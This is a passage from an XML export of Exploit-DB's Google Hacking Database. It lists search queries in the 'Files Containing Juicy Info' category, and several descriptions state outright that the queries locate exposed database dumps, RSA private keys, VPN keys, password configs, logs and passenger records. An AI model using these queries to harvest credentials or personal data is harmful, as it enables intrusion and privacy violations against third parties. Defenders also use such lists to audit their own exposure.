<id>4519</id>
<link>https://www.exploit-db.com/ghdb/4519</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;-- MySQL Administrator dump&quot; ext:sql</shortDescription>
<textualDescription>Finds some nice database dumps, potentially containing usernames,
passwords, and other cool stuff!
Dxtroyer</textualDescription>
<query>&quot;-- MySQL Administrator dump&quot; ext:sql</query>
<querystring>https://www.google.com/search?q=&quot;-- MySQL Administrator dump&quot; ext:sql</querystring>
<edb></edb>
<date>2017-06-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>4495</id>
<link>https://www.exploit-db.com/ghdb/4495</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;-- MySQL dump&quot; ext:sql -git</shortDescription>
<textualDescription>Finds MySQL database dumps, sometimes containing usernames, passwords, and
more!
Dxtroyer</textualDescription>
<query>&quot;-- MySQL dump&quot; ext:sql -git</query>
<querystring>https://www.google.com/search?q=&quot;-- MySQL dump&quot; ext:sql -git</querystring>
<edb></edb>
<date>2017-05-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>8261</id>
<link>https://www.exploit-db.com/ghdb/8261</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;-- phpMyAdmin SQL Dump&quot; ext:txt</shortDescription>
<textualDescription># Google Dork: &quot;-- phpMyAdmin SQL Dump&quot; ext:txt
# Files Containing Juicy Info
# Date: 18/10/2023
# Exploit Reza Abasi</textualDescription>
<query>&quot;-- phpMyAdmin SQL Dump&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;-- phpMyAdmin SQL Dump&quot; ext:txt</querystring>
<edb></edb>
<date>2023-10-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6645</id>
<link>https://www.exploit-db.com/ghdb/6645</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;-- Server version&quot; &quot;-- MySQL Administrator dump 1.4&quot; ext:sql</shortDescription>
<textualDescription># Google Dork: &quot;-- Server version&quot; &quot;-- MySQL Administrator dump 1.4&quot; ext:sql
# Files Containing Juicy Info. MySQL dumps, sometimes containing usernames,
passwords and other stuff
# Date: 27/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;-- Server version&quot; &quot;-- MySQL Administrator dump 1.4&quot; ext:sql</query>
<querystring>https://www.google.com/search?q=&quot;-- Server version&quot; &quot;-- MySQL Administrator dump 1.4&quot; ext:sql</querystring>
<edb></edb>
<date>2020-10-28</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5927</id>
<link>https://www.exploit-db.com/ghdb/5927</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;-----BEGIN CERTIFICATE-----&quot; ext:pem -git</shortDescription>
<textualDescription># Google Dork: &quot;-----BEGIN CERTIFICATE-----&quot; ext:pem -git
# Various certificates including ssl, root, X509, etc.
# Date: 20/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;-----BEGIN CERTIFICATE-----&quot; ext:pem -git</query>
<querystring>https://www.google.com/search?q=&quot;-----BEGIN CERTIFICATE-----&quot; ext:pem -git</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5925</id>
<link>https://www.exploit-db.com/ghdb/5925</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;-----BEGIN OpenVPN Static key V1-----&quot; ext:key</shortDescription>
<textualDescription># Google Dork: &quot;-----BEGIN OpenVPN Static key V1-----&quot; ext:key
# OpenVPN static keys.
# Date: 20/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;-----BEGIN OpenVPN Static key V1-----&quot; ext:key</query>
<querystring>https://www.google.com/search?q=&quot;-----BEGIN OpenVPN Static key V1-----&quot; ext:key</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6337</id>
<link>https://www.exploit-db.com/ghdb/6337</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;-----BEGIN RSA PRIVATE KEY-----&quot; inurl:id_rsa</shortDescription>
<textualDescription>Dork: &quot;-----BEGIN RSA PRIVATE KEY-----&quot; inurl:id_rsa
Description: Some hashes (passwords, certs, etc.)
Author: Sandeep Kumar
</textualDescription>
<query>&quot;-----BEGIN RSA PRIVATE KEY-----&quot; inurl:id_rsa</query>
<querystring>https://www.google.com/search?q=&quot;-----BEGIN RSA PRIVATE KEY-----&quot; inurl:id_rsa</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Sandeep Kumar</author>
</entry>
<entry>
<id>4518</id>
<link>https://www.exploit-db.com/ghdb/4518</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;-----BEGIN X509 CERTIFICATE-----&quot; ext:pem -git</shortDescription>
<textualDescription>Finds X.509 server certificates
Dxtroyer</textualDescription>
<query>&quot;-----BEGIN X509 CERTIFICATE-----&quot; ext:pem -git</query>
<querystring>https://www.google.com/search?q=&quot;-----BEGIN X509 CERTIFICATE-----&quot; ext:pem -git</querystring>
<edb></edb>
<date>2017-06-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>7396</id>
<link>https://www.exploit-db.com/ghdb/7396</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;.:/opt/remi/php56/root/usr/share/pear&quot; | &quot;:/opt/remi/php56/root/usr/share/php&quot;</shortDescription>
<textualDescription># Google Dork: &quot;.:/opt/remi/php56/root/usr/share/pear&quot; | &quot;:/opt/remi/php56/root/usr/share/php&quot;
# Files Containing Juicy Info
# Date: 28/09/2021
# Exploit Author: MiningOmerta
#Description: Path disclosure, outdated PHP version disclosure, service disclosure, and virtualenv within the service disclosure</textualDescription>
<query>&quot;.:/opt/remi/php56/root/usr/share/pear&quot; | &quot;:/opt/remi/php56/root/usr/share/php&quot;</query>
<querystring>https://www.google.com/search?q=&quot;.:/opt/remi/php56/root/usr/share/pear&quot; | &quot;:/opt/remi/php56/root/usr/share/php&quot;</querystring>
<edb></edb>
<date>2021-10-05</date>
<author>MiningOmerta</author>
</entry>
<entry>
<id>5241</id>
<link>https://www.exploit-db.com/ghdb/5241</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;/FTPSVC2&quot; intitle:&quot;index of&quot;</shortDescription>
<textualDescription>Microsoft FTP server logs.
You can change the file last number to get more results: FTPSVC3, FTPSVC4
and so on... Or (Not recommended) use
&quot;/FTPSVC2&quot; | &quot;/FTPSVC3&quot; intitle:&quot;index of&quot;
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
@brulliant
</textualDescription>
<query>&quot;/FTPSVC2&quot; intitle:&quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=&quot;/FTPSVC2&quot; intitle:&quot;index of&quot;</querystring>
<edb></edb>
<date>2019-06-03</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4452</id>
<link>https://www.exploit-db.com/ghdb/4452</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;/wp-admin/admin-ajax&quot; ext:txt</shortDescription>
<textualDescription>Finds robots.txt files, which provide info about the server's more
sensitive side (Which can't be found with Google)
Dxtroyer</textualDescription>
<query>&quot;/wp-admin/admin-ajax&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;/wp-admin/admin-ajax&quot; ext:txt</querystring>
<edb></edb>
<date>2017-05-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>5611</id>
<link>https://www.exploit-db.com/ghdb/5611</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;accounts.xlsx&quot; ext:xlsx</shortDescription>
<textualDescription># Google Dork : &quot;accounts.xlsx&quot; ext:xlsx
# Category : File contains Juicy items
# Date : 03-11-2019
# Author : Rohitreddy</textualDescription>
<query>&quot;accounts.xlsx&quot; ext:xlsx</query>
<querystring>https://www.google.com/search?q=&quot;accounts.xlsx&quot; ext:xlsx</querystring>
<edb></edb>
<date>2019-11-04</date>
<author>Rohitreddy</author>
</entry>
<entry>
<id>4895</id>
<link>https://www.exploit-db.com/ghdb/4895</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;air confirmation&quot; &quot;passenger(s)&quot;</shortDescription>
<textualDescription>Dork with very juicy information.
Rootkit Pentester.
</textualDescription>
<query>&quot;air confirmation&quot; &quot;passenger(s)&quot;</query>
<querystring>https://www.google.com/search?q=&quot;air confirmation&quot; &quot;passenger(s)&quot;</querystring>
<edb></edb>
<date>2018-07-20</date>
<author>Rootkit_Pentester</author>
</entry>
<entry>
<id>398</id>
<link>https://www.exploit-db.com/ghdb/398</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;allow_call_time_pass_reference&quot; &quot;PATH_INFO&quot;</shortDescription>
<textualDescription>Returns publically visible pages generated by the php function phpinfo(). This search differs from other phpinfo() searches in that it doesn't depend on the filename being called &quot;phpinfo.php&quot;. Some result files that include phpinfo are:</textualDescription>
<query>&quot;allow_call_time_pass_reference&quot; &quot;PATH_INFO&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22allow_call_time_pass_reference%22+%22PATH_INFO%22</querystring>
<edb></edb>
<date>2004-08-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>4539</id>
<link>https://www.exploit-db.com/ghdb/4539</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Blocking Reason:&quot; ext:log -git</shortDescription>
<textualDescription>Finds security breach logs
Dxtroyer</textualDescription>
<query>&quot;Blocking Reason:&quot; ext:log -git</query>
<querystring>https://www.google.com/search?q=&quot;Blocking Reason:&quot; ext:log -git</querystring>
<edb></edb>
<date>2017-06-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>7397</id>
<link>https://www.exploit-db.com/ghdb/7397</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;boarding pass&quot; site:http://tripadvisor.com</shortDescription>
<textualDescription># Google Dork: &quot;boarding pass&quot; site:http://tripadvisor.com
# Files Containing Juicy Info
# Date:06/10/2021
# Exploit Author: Allan Jay Dumanhug</textualDescription>
<query>&quot;boarding pass&quot; site:http://tripadvisor.com</query>
<querystring>https://www.google.com/search?q=&quot;boarding pass&quot; site:http://tripadvisor.com</querystring>
<edb></edb>
<date>2021-10-06</date>
<author>Allan Jay Dumanhug</author>
</entry>
<entry>
<id>644</id>
<link>https://www.exploit-db.com/ghdb/644</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Certificate Practice Statement&quot; inurl:(PDF | DOC)</shortDescription>
<textualDescription>Certificate Practice Statement (CPS)A CPS defines the measures taken to secure CA operation and the management of CA-issued certificates. You can consider a CPS to be an agreement between the organization managing the CA and the people relying on on the certificates issued by the CA.</textualDescription>
<query>&quot;Certificate Practice Statement&quot; inurl:(PDF | DOC)</query>
<querystring>https://www.google.com/search?safe=off&amp;q=%22Certificate+Practice+Statement%22+inurl%3A%28PDF+%7C+DOC%29</querystring>
<edb></edb>
<date>2004-11-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1428</id>
<link>https://www.exploit-db.com/ghdb/1428</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Cisco PIX Security Appliance Software Version&quot; + &quot;Serial Number&quot; + &quot;show ver&quot; -inurl</shortDescription>
<textualDescription>Google search for Pix Authorization Keys
Author: fdisk</textualDescription>
<query>&quot;Cisco PIX Security Appliance Software Version&quot; + &quot;Serial Number&quot; + &quot;show ver&quot; -inurl</query>
<querystring>https://www.google.com/search?q=%22Cisco+PIX+Security+Appliance+Software+Version%22+%2B+%22Serial+Number%22+%2B+%22show+ver%22+-inurl&amp;num=10&amp;ft=i&amp;cr=&amp;safe=images</querystring>
<edb></edb>
<date>2010-11-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4521</id>
<link>https://www.exploit-db.com/ghdb/4521</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Consola de Joomla! Debug&quot; inurl:index.php</shortDescription>
<textualDescription>Dork to find the Joomla Debug console that gives us the following
information
&gt; Session
&gt; Profile Information
&gt; Memory usage
&gt; Database Registration
&quot;Consola de Joomla! Debug&quot; inurl:index.php
Drok3r</textualDescription>
<query>&quot;Consola de Joomla! Debug&quot; inurl:index.php</query>
<querystring>https://www.google.com/search?q=&quot;Consola de Joomla! Debug&quot; inurl:index.php</querystring>
<edb></edb>
<date>2017-06-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>5951</id>
<link>https://www.exploit-db.com/ghdb/5951</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;DBPassword&quot; ext:cfg OR ext:log OR ext:txt OR ext:sql -git</shortDescription>
<textualDescription># Google Dorks:
&quot;DBPassword&quot; ext:cfg OR ext:log OR ext:txt OR ext:sql -git
&quot;DBUsername&quot; ext:cfg OR ext:log OR ext:txt OR ext:sql -git
# By using this dork some exposed database passwords can be found.
# Date: 27/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;DBPassword&quot; ext:cfg OR ext:log OR ext:txt OR ext:sql -git</query>
<querystring>https://www.google.com/search?q=&quot;DBPassword&quot; ext:cfg OR ext:log OR ext:txt OR ext:sql -git</querystring>
<edb></edb>
<date>2020-04-27</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4754</id>
<link>https://www.exploit-db.com/ghdb/4754</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Declassified and Approved for Release by&quot; filetype: pdf</shortDescription>
<textualDescription>&quot;Declassified and Approved for Release by&quot; filetype: pdf
This dork show some interested docs of NSA,CIA,...
ManhNho
</textualDescription>
<query>&quot;Declassified and Approved for Release by&quot; filetype: pdf</query>
<querystring>https://www.google.com/search?q=&quot;Declassified and Approved for Release by&quot; filetype: pdf</querystring>
<edb></edb>
<date>2018-04-09</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4630</id>
<link>https://www.exploit-db.com/ghdb/4630</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Do not distribute&quot; (ext:pdf | ext:doc | ext:docx | ext:rtf)</shortDescription>
<textualDescription>Finds confidential documents with the &quot;DO NOT DISTRIBUTE&quot; tag
Dxtroyer
</textualDescription>
<query>&quot;Do not distribute&quot; (ext:pdf | ext:doc | ext:docx | ext:rtf)</query>
<querystring>https://www.google.com/search?q=&quot;Do not distribute&quot; (ext:pdf | ext:doc | ext:docx | ext:rtf)</querystring>
<edb></edb>
<date>2017-12-07</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>4663</id>
<link>https://www.exploit-db.com/ghdb/4663</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Email delivery powered by Google&quot; ext:pdf OR ext:txt</shortDescription>
<textualDescription>Dork for use to read mails of subscribtions and other juice data.
Dork for Rootkit_Pentester.
Regards.
</textualDescription>
<query>&quot;Email delivery powered by Google&quot; ext:pdf OR ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;Email delivery powered by Google&quot; ext:pdf OR ext:txt</querystring>
<edb></edb>
<date>2018-01-26</date>
<author>Rootkit_Pentester</author>
</entry>
<entry>
<id>4413</id>
<link>https://www.exploit-db.com/ghdb/4413</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Fatal NI connect error&quot; &quot;, connecting to:&quot; ext:log</shortDescription>
<textualDescription>Finds a whole load of different application logs (with errors!)
Dxtroyer</textualDescription>
<query>&quot;Fatal NI connect error&quot; &quot;, connecting to:&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;Fatal NI connect error&quot; &quot;, connecting to:&quot; ext:log</querystring>
<edb></edb>
<date>2017-04-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>5702</id>
<link>https://www.exploit-db.com/ghdb/5702</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;fetchmailrc&quot; intitle:&quot;index of&quot; -linux</shortDescription>
<textualDescription>Fetchmail files containing juicy info and sometimes passwords
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>&quot;fetchmailrc&quot; intitle:&quot;index of&quot; -linux</query>
<querystring>https://www.google.com/search?q=&quot;fetchmailrc&quot; intitle:&quot;index of&quot; -linux</querystring>
<edb></edb>
<date>2020-01-23</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4028</id>
<link>https://www.exploit-db.com/ghdb/4028</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Futon on Apache&quot; inurl:_utils</shortDescription>
<textualDescription>Exposed CouchDB admin panels
By Gabor Szathmari</textualDescription>
<query>&quot;Futon on Apache&quot; inurl:_utils</query>
<querystring>https://www.google.com/search?q=&quot;Futon on Apache&quot; inurl:_utils</querystring>
<edb></edb>
<date>2015-06-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>750</id>
<link>https://www.exploit-db.com/ghdb/750</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Generated by phpSystem&quot;</shortDescription>
<textualDescription>PhpSystem shows info about unix systems, including: General Info (kernel, cpu, uptime), Connections, Who Is Logged In, Memory, Swap and active mounts.</textualDescription>
<query>&quot;Generated by phpSystem&quot;</query>
<querystring>https://www.google.com/search?q=%22Generated+by+phpSystem%22</querystring>
<edb></edb>
<date>2004-12-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>42</id>
<link>https://www.exploit-db.com/ghdb/42</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;generated by wwwstat&quot;</shortDescription>
<textualDescription>More www statistics on the web. This one is very nice.. Lots of directory info, and client access statistics, email addresses.. lots os good stuff.You know, these are SOOO dangerous, especially if INTRANET users get logged... talk about mapping out an intranet quickly...thanks, sac =)</textualDescription>
<query>&quot;This summary was generated by wwwstat&quot;</query>
<querystring>https://www.google.com/search?q=%22This+summary+was+generated+by+wwwstat%22</querystring>
<edb></edb>
<date>2003-06-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>3961</id>
<link>https://www.exploit-db.com/ghdb/3961</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;google confidential&quot; filetype:pdf</shortDescription>
<textualDescription>&quot;google confidential&quot; filetype:pdf
Google leaking their own files</textualDescription>
<query>&quot;google confidential&quot; filetype:pdf</query>
<querystring>https://www.google.com/search?q=&quot;google confidential&quot; filetype:pdf</querystring>
<edb></edb>
<date>2014-09-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4417</id>
<link>https://www.exploit-db.com/ghdb/4417</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Greenstone receptionist&quot; inurl:&quot;/etc/main.cfg&quot;</shortDescription>
<textualDescription>Finds web app configs
Dxtroyer</textualDescription>
<query>&quot;Greenstone receptionist&quot; inurl:&quot;/etc/main.cfg&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Greenstone receptionist&quot; inurl:&quot;/etc/main.cfg&quot;</querystring>
<edb></edb>
<date>2017-04-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>4424</id>
<link>https://www.exploit-db.com/ghdb/4424</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;havij report&quot; &quot;Target&quot; ext:html</shortDescription>
<textualDescription>Dork who show the havij sqli injection reports.
Dork by Rootkit Pentester.</textualDescription>
<query>&quot;havij report&quot; &quot;Target&quot; ext:html</query>
<querystring>https://www.google.com/search?q=&quot;havij report&quot; &quot;Target&quot; ext:html</querystring>
<edb></edb>
<date>2017-04-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>147</id>
<link>https://www.exploit-db.com/ghdb/147</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Host Vulnerability Summary Report&quot;</shortDescription>
<textualDescription>This search yeids host vulnerability scanner reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned.</textualDescription>
<query>&quot;Host Vulnerability Summary Report&quot;</query>
<querystring>https://www.google.com/search?q=%22Host+Vulnerability+Summary+Report%22+</querystring>
<edb></edb>
<date>2004-03-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>4465</id>
<link>https://www.exploit-db.com/ghdb/4465</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;HTTP&quot; inurl:&quot;access.log&quot; ext:log</shortDescription>
<textualDescription>Finds logs which contain info about website activity
Dxtroyer</textualDescription>
<query>&quot;HTTP&quot; inurl:&quot;access.log&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;HTTP&quot; inurl:&quot;access.log&quot; ext:log</querystring>
<edb></edb>
<date>2017-05-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>208</id>
<link>https://www.exploit-db.com/ghdb/208</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;HTTP_FROM=googlebot&quot; googlebot.com &quot;Server_Software=&quot;</shortDescription>
<textualDescription>These pages contain trace information that was collected when the googlebot crawled a page. The information can include many different things such as path names, header information, server software versions and much more. Attackers can use information like this to formulate an attack against a site.</textualDescription>
<query>&quot;HTTP_FROM=googlebot&quot; googlebot.com &quot;Server_Software=&quot;</query>
<querystring>https://www.google.com/search?q=%22HTTP_FROM%3Dgooglebot%22++googlebot.com+%22Server_Software%3D%22</querystring>
<edb></edb>
<date>2004-05-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>7868</id>
<link>https://www.exploit-db.com/ghdb/7868</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Index of /backup&quot;</shortDescription>
<textualDescription># Google Dork: “Index of /backup”
# Files Containing Juicy Info
# Date:06/15/2022
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>=?UTF-8?Q?=E2=80=9CIndex_of_/backup=E2=80=9D?=</query>
<querystring>https://www.google.com/search?q==?UTF-8?Q?=E2=80=9CIndex_of_/backup=E2=80=9D?=</querystring>
<edb></edb>
<date>2022-06-15</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>4306</id>
<link>https://www.exploit-db.com/ghdb/4306</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Index of /wp-content/uploads/backupbuddy_backups&quot; zip</shortDescription>
<textualDescription>Search for iThemes BackupBuddy backup zips
balcsida</textualDescription>
<query>&quot;Index of /wp-content/uploads/backupbuddy_backups&quot; zip</query>
<querystring>https://www.google.com/search?q=&quot;Index of /wp-content/uploads/backupbuddy_backups&quot; zip</querystring>
<edb></edb>
<date>2016-07-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>6267</id>
<link>https://www.exploit-db.com/ghdb/6267</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of sqlite&quot;</shortDescription>
<textualDescription># Google Dork: &quot;index of sqlite&quot;
# Title: SQLITE file disclosure
# Date: 06/06/2020
# Author: Mahesh Rai
# LinkedIn: https://www.linkedin.com/in/mahesh-rai
# Bugcrowd: https://bugcrowd.com/Mahesh_Rai
</textualDescription>
<query>&quot;index of sqlite&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of sqlite&quot;</querystring>
<edb></edb>
<date>2020-06-10</date>
<author>Mahesh Rai</author>
</entry>
<entry>
<id>8345</id>
<link>https://www.exploit-db.com/ghdb/8345</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; &quot;./&quot; &quot;./bitcoin&quot;</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; &quot;./&quot; &quot;./bitcoin&quot;
# Files Containing Juicy Info
# Date: 17/11/2023
# Exploit: Saleh Lardhi</textualDescription>
<query>New google dork for bitcoin - Saleh Lardhi</query>
<querystring>https://www.google.com/search?q=New google dork for bitcoin - Saleh Lardhi</querystring>
<edb></edb>
<date>2023-11-17</date>
<author>Saleh Lardhi</author>
</entry>
<entry>
<id>6292</id>
<link>https://www.exploit-db.com/ghdb/6292</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Index of&quot; &quot;/access&quot;</shortDescription>
<textualDescription>Google Dork: &quot;Index of&quot; &quot;/access&quot;
Category: Files containing Juicy Info
Author: Prashant Sharma
LinkedIn: https://www.linkedin.com/in/prashantique/
</textualDescription>
<query>&quot;Index of&quot; &quot;/access&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Index of&quot; &quot;/access&quot;</querystring>
<edb></edb>
<date>2020-06-16</date>
<author>Prashant Sharma</author>
</entry>
<entry>
<id>6633</id>
<link>https://www.exploit-db.com/ghdb/6633</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; &quot;/home/000~ROOT~000/etc&quot;</shortDescription>
<textualDescription>Google Dork: &quot;index of&quot; &quot;/home/000~ROOT~000/etc&quot;
Description: Juicy Information and Sensitive Directories.
Author: Sibi Mathew George
</textualDescription>
<query>&quot;index of&quot; &quot;/home/000~ROOT~000/etc&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;/home/000~ROOT~000/etc&quot;</querystring>
<edb></edb>
<date>2020-10-21</date>
<author>Sibi Mathew George</author>
</entry>
<entry>
<id>6338</id>
<link>https://www.exploit-db.com/ghdb/6338</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Index of&quot; &quot;accounts.sql&quot;</shortDescription>
<textualDescription>Title: Containing juicy info
Google Dork: &quot;Index of&quot; &quot;accounts.sql&quot;
Date: 28/06/2020
Author : Mohit khemchandani</textualDescription>
<query>&quot;Index of&quot; &quot;accounts.sql&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Index of&quot; &quot;accounts.sql&quot;</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Mohit khemchandani</author>
</entry>
<entry>
<id>6512</id>
<link>https://www.exploit-db.com/ghdb/6512</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; &quot;callback.php&quot;</shortDescription>
<textualDescription> Google Dork: &quot;index of&quot; &quot;callback.php&quot;
Category: Files Containing Juicy Info
Author: Prashant Sharma (@Prashantique)
LinkedIn: https://www.linkedin.com/in/prashantique
</textualDescription>
<query>&quot;index of&quot; &quot;callback.php&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;callback.php&quot;</querystring>
<edb></edb>
<date>2020-09-01</date>
<author>Prashant Sharma</author>
</entry>
<entry>
<id>8274</id>
<link>https://www.exploit-db.com/ghdb/8274</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; &quot;cloudapp.azure.com&quot;</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; &quot;cloudapp.azure.com&quot;
# Files Containing Juicy Info
# Date: 23/10/2023
# Exploit Sibi Mathew George</textualDescription>
<query>&quot;index of&quot; &quot;cloudapp.azure.com&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;cloudapp.azure.com&quot;</querystring>
<edb></edb>
<date>2023-10-23</date>
<author>Sibi Mathew George</author>
</entry>
<entry>
<id>8275</id>
<link>https://www.exploit-db.com/ghdb/8275</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; &quot;cloudapp.net&quot;</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; &quot;cloudapp.net&quot;
# Files Containing Juicy Info
# Date: 23/10/2023
# Exploit Sibi Mathew George</textualDescription>
<query>&quot;index of&quot; &quot;cloudapp.net&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;cloudapp.net&quot;</querystring>
<edb></edb>
<date>2023-10-23</date>
<author>Sibi Mathew George</author>
</entry>
<entry>
<id>6258</id>
<link>https://www.exploit-db.com/ghdb/6258</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Index of&quot; &quot;customer.php&quot;</shortDescription>
<textualDescription> Google Dork: &quot;Index of&quot; &quot;customer.php&quot;
Category: Files Containing Juicy Info
Author: Prashant Sharma
LinkedIn: https://www.linkedin.com/in/prashantique/
</textualDescription>
<query>&quot;Index of&quot; &quot;customer.php&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Index of&quot; &quot;customer.php&quot;</querystring>
<edb></edb>
<date>2020-06-10</date>
<author>Prashant Sharma</author>
</entry>
<entry>
<id>8302</id>
<link>https://www.exploit-db.com/ghdb/8302</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; &quot;firewall.log&quot; | &quot;firewall.logs&quot;</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; &quot;firewall.log&quot; | &quot;firewall.logs&quot;
# Files Containing Juicy Info
# Date: 01/11/2023
# Exploit: NITYA NAND JHA</textualDescription>
<query>Firewall Log Google Dork Submission</query>
<querystring>https://www.google.com/search?q=Firewall Log Google Dork Submission</querystring>
<edb></edb>
<date>2023-11-01</date>
<author>NITYA NAND JHA</author>
</entry>
<entry>
<id>6281</id>
<link>https://www.exploit-db.com/ghdb/6281</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; &quot;siri&quot;</shortDescription>
<textualDescription>Google Dork: &quot;index of&quot; &quot;siri&quot;
Category: Files Containing Juicy Info
Author: Prashant Sharma
LinkedIn: https://www.linkedin.com/in/prashantique/
</textualDescription>
<query>&quot;index of&quot; &quot;siri&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;siri&quot;</querystring>
<edb></edb>
<date>2020-06-15</date>
<author>Prashant Sharma</author>
</entry>
<entry>
<id>6208</id>
<link>https://www.exploit-db.com/ghdb/6208</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; &quot;sshd_config&quot;</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; &quot;sshd_config&quot;
# Title: Configuration files disclosure.
# Date: 04/06/2020
# Author: Bhaskar Kumar
</textualDescription>
<query>&quot;index of&quot; &quot;sshd_config&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;sshd_config&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Bhaskar Kumar</author>
</entry>
<entry>
<id>6483</id>
<link>https://www.exploit-db.com/ghdb/6483</link>
<category>Files Containing Juicy Info</category>
